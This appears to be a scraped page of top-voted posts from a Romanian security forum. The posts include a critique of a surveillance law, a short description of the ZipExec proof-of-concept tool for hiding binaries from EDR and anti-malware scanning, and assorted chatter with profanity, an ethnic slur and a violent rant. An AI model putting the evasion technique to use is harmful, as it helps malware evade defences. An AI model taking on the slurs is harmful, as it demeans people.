modificare la acest cod. (indiciu: e o lege organică, greu de modificat). Doar că dincolo de a impune obligații similare și unor alte categorii furnizori (care oricum, nu au legătura cu ANCOM) pe unde se plimbă în 2021 conținutul și legal, și ilegal. (poate de discutat, dar atunci ar trebui în CPP și nu pe șest), textul lărgește mult spectrul de acțiuni de interceptări și acces, pe care CPP nu le prevede. Mă opresc doar la 2 aici: „accesul la conţinutul comunicaţiilor criptate tranzitate în reţelele proprii;” nu există în CPP. Dincolo de faptul ca un furnizor (inclusiv cei de comunicații) ar trebui să își creeze un sistem de depistare a conținutului criptate tranzitat, eu cred că ținta sunt furnizorii care oferă astfel de servicii. Aici sunt 2 variante – fie vor conținutul decriptat direct de la furnizor sau pentru ca vor să spargă criptarea? (cât de legal, ilegal ar fi, este o altă discuție) , fie vor conținutul criptat pentru că vor să obțină/determine partea care are cheia de criptare să o dezvăluie cumva. Astea, ca și altele din același spectru ridică niște subiecte de privacy și security mult prea complexe pentru a le rezolva în 2 propoziții (dau însă 2 linkuri - Bugs in our Pockets: The Risks of Client-Side Scanning și un document leak-uit de la Comisie) Să nu mai zicem că textul Directivei de implementat zice exact pe dos – promovați criptarea, nu o subminați: „ar trebui promovată de exemplu utilizarea criptării, end-to-end dacă este cazul, și, dacă este necesar, criptarea ar trebui să fie obligatorie în conformitate cu principiile securității și protejării vieții private în mod implicit și din faza de proiectare” „să permită, în cazul furnizorilor de servicii de găzduire (...) accesul la propriile sisteme informatice, în vederea copierii sau extragerii datelor existente.”nu există în CPP. O terminologie la fel de vagă ca cea din defuncta lege a securității cibernetice (declarata neconstituțională în 2015) face ca să ai practic acces la orice conținut de pe orice server din România în condiții total neclare. (asta e demnă de capabilitățile NSA) Vrei acces la documentația unui jurnalist? Nu accesezi redacția, ci serviciul de găzduire al redacției. Oricum presa era la amenințări de „securitate națională”, nu? Capisci? V. Deci: Încolonarea și înregistrarea Ca să poată probabil să justifice cumva integrarea în această lege, propunerea normativă mai și creează o obligație de înregistrare a acestor noi furnizori la ANCOM, ceea ce contrazice flagrant legislația europeană în domeniu (în principal directiva e-commerce, implementată la noi prin legea 365/2002). Dar ce mai contează o obligație europeana, când e în joc „securitatea națională”? Important e că le putem impune să își creeze, pe costuri proprii, infrastructura de interceptare și când vine o hârtie de la „organ” să dea tot. VI. Concluzie? Dincolo de orice discuție pe fond, a propune astfel de soluții legislative de interceptare a comunicațiilor pe ușa din dos, evitând orice dezbatere publică nu este doar profund nedemocratică, dar chiar jignitoare la adresa unui popor exact într-un moment în care ar trebui să fie convins de același stat că îi vrea binele prin măsurile propuse, nu că de fapt sunt niște cobai, inclusiv pentru unele măsuri de supraveghere „semnate ca primarul.” Sau cine știe poate se trezește Senatul, presa sau cetățenii să îi ia la niște întrebări – cine a propus, de fapt, textul? De ce acum? De ce aici? De ce acest text și nu altul? De ce nu în CPP? De ce nu s-a făcut vreo dezbatere publică? PS: Am atașat la articol un document unde am OCR-izat textele relevante strecurate după dezbaterea publică, pentru a nu vă obliga să căutați în peste 900 de pagini cu imagini exact unde sunt textele cu pricina... Sursa: https://apti.ro/largirea-interceptarii-comunicatiilor-electronice-impusa-pe-sest?
    5 points
  37. ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded into a string that is rebuilt on disk. This encoded string is then loaded into a JScript file that when executed, would rebuild the password-protected zip file on disk and execute it. This is done programmatically by using COM objects to access the GUI-based functions in Windows via the generated JScript loader, executing the loader inside the password-protected zip without having to unzip it first. By password protecting the zip file, it protects the binary from EDRs and disk-based or anti-malware scanning mechanisms. https://github.com/Tylous/ZipExec
    5 points
  38. "Buna ziua !Eu sunt Ionuț și m-am vaccinat! " Suna a întâlnire AA 😁
    5 points
  39. Da, cand isi vinde @Zatarra masina o sa puna in anunt: "Condusa de un batranel pana la data-center si inapoi".
    5 points
  40. Ironic... Acum câteva zile ți-a zis cineva efevtiv de win+L... Of ce trece timpul
    5 points
  41. Sa zicem ca vrei sa iti faci un site unicat cum nu mai exista pe internet la ora actuala dar, ca sa nu folosesti functii php sau Python de exemplu (in caz ca folosesti Django) fiindca nu vrei sa rupi serverul si sa fie mai tot timpul picat din cauza a foarte putini utilizatori, te gandesti la ceva gen Javascript care practic este Clent Side si fiecare viziator/utilizator isi foloseste propriul browser pentru a utiliza diverse functii oferite de site. Problema cu Javascript este ca oricare daca se pricepe (si nu-i neaparat greu) iti poate lua functiile din javascript si sa le foloseasca dupa cum doreste in propriile lui aplicatii sau chiar sa le converteasca in C++ ca limbajele sunt oarecum asemanatoare si sa faca aplicatii pe baza codului tau sursa asta dupa tu ce ti-ai stors creierii si nervii sau poate ai dat bani unui programator sa-ti faca ceva frumos asa cum vrei tu. Exista un soi de obfuscare in Javascript dar am inteles ca se poate decoda la loc si rezulta codul original. Ce altceva s-a putea folosi care sa fie client side dar codul sa fie protejat si sa nu poata fi furat de utilizatorii sitului (sau citit si creat exploituri dupa el) ? Multumesc mult de tot!
    5 points
  42. Nu au venit toti cei care s-au anuntat, dar a fost fun Nu uitati: 28 august, Cluj, bere! Cine vrea sa mearga de la Bucuresti sa imi zica zilele astea!
    5 points
  43. 90% din astia care ati comentat aici sunteti rupti de realitate. Total. Voi credeti ca toata Romania arata asa cum o vedeti voi cand va duceti in Centrul Vechi in Brasov? Sau cum este in Cluj? Sau in Bucuresti? Duceti-va la 20 de km de orice oras mare, inclusiv Bucuresti si o sa vedeti acolo saracie. Voi aveti habar ca exista oameni care nu au mai mancat carne de ani de zile pentru ca nu isi permit? Copii care nu se pot duce la scoala ca nu au haine? Voi sunteti tara lui Citu, cu crestere economica. Daca esti sarac si nu ai bani de haine, si nu zic haine scumpe, ci sa arati ingrijit, nici nu te lasa sa intri intr-o companie, pentru un interviu. Daca ai un Logan cazut din 2000, nici bariera nu ti-o deschide paznicu. Am fost sa fac vaccinul la Veridia in Bucuresti, clinica privata, prima doza. Si la Spitalul Neghinita rapelul. Spital de stat. Are rost sa va spun unde m-am simtit ca un gunoi? Cati dintre astia de aici ati avut operatii de facut in ultimii ani si ati stat la cozi, pe holuri de spitale, cu firele atarnand in voi? Analizele, unde vi le faceti? La Regina Maria, nu-i asa? Stiti cum e sa te duci de la 3 dimineata in prima zi din luna sa iti faci analizele, pentru ca altfel nu mai prinzi loc la gratuite? Sunt oameni care au platit 50 de ani la asigurarea de sanataet si nu prind locuri la analize. Ba, la analize. Nu vorbesc de operatii pe creier. Daca ma duc sa imi spal masina, se uita cioara aia la mine ca si cum am futut-o pe ma-sa cand ma urc in masina si nu ii dau ciubuc. Am fost cu prietena mea la spital in Medgidia pentru ca i-a intrat un cui in picior la mare si am stat 5 ore. 5 ore ba, sa se uite un medic la ea. Erau unii cu mainile si picioarele rupte, tot 5 ore a durat. Inainte sa ziceti ca o duceti bine si ca va place in tara asta, mai scoateti si voi capu din bula in care traiti, ca daca maine da un handicapat cu masina peste voi pe trecere, o sa muriti ca ultimii caini pana vine ambulanta. Pentru ca unu cu Audi A8 il doare in pula de ambulanta voastra si nu se da la o parte. Si daca nu muriti de masina aluia, va omoara microbii din spital. Ce plm e frumos in tara asta? Ca daca vreau sa ii fac reclamatie veecinului de la 5 ca da muzica tare, daca chem politia si ala a oprit muzica intre timp, eu iau amenda. Daca vreau sa parchez in fata unei cafenele, trebuie sa ma uit stanga-dreapta dupa parcangii, ca altfel ma trezesc cu chei pe masina. Am fost de 100 de ori in pragul unei crize pentru ca eu astept la rand la Auchan/Kaufland si altii se baga in fata mea. Repet, iesiti din bula. Romania nu e salariul de IT-ist, nici colegul corporatist si nici vecinii din Plm Residence. Romania arata diferit. Daca as putea, as da foc la toata tara, inclusiv oamenilor din ea, inclusiv mie. Doar asa tare asta mai are o sansa. Duceti-va in Serbia sau in Macedonia de Nord, tari pe care voi le credeti sub noi, sa vedeti cum se comporta oamenii cu voi la magazine. Cum se comporta aia la primarie cu voi. Am fost in Belgrad sa-mi fac abonament la bicicleta gratuita(Da, ai nevoie de un card pentru sistemul de bicicelete din Belgrad). M-am simtit ca si cum as fi fost fiu de parlamentar in Romania. Am facut programare la 10:50. La 10:45 eram cu cardu in mana. Adica mai devreme cu 5 minute.
    5 points
  44. mai bine ne-ai spune ce fumezi
    5 points
  45. Du-te ma in pula mea de tigan mustacios cu politica si curvele tale. @taffy00 da-mi mesaj privat cu ce ai nevoie si adresa. Am cutii intregi cu hainute si tot ce ai nevoie si te pot ajuta si cu ceva banuti
    5 points
  46. I took money because I had an argument with Aerosol, permanently for the reason: "Error". tutuappvip.co routingnumbers.onl
    5 points
×
×
  • Create New...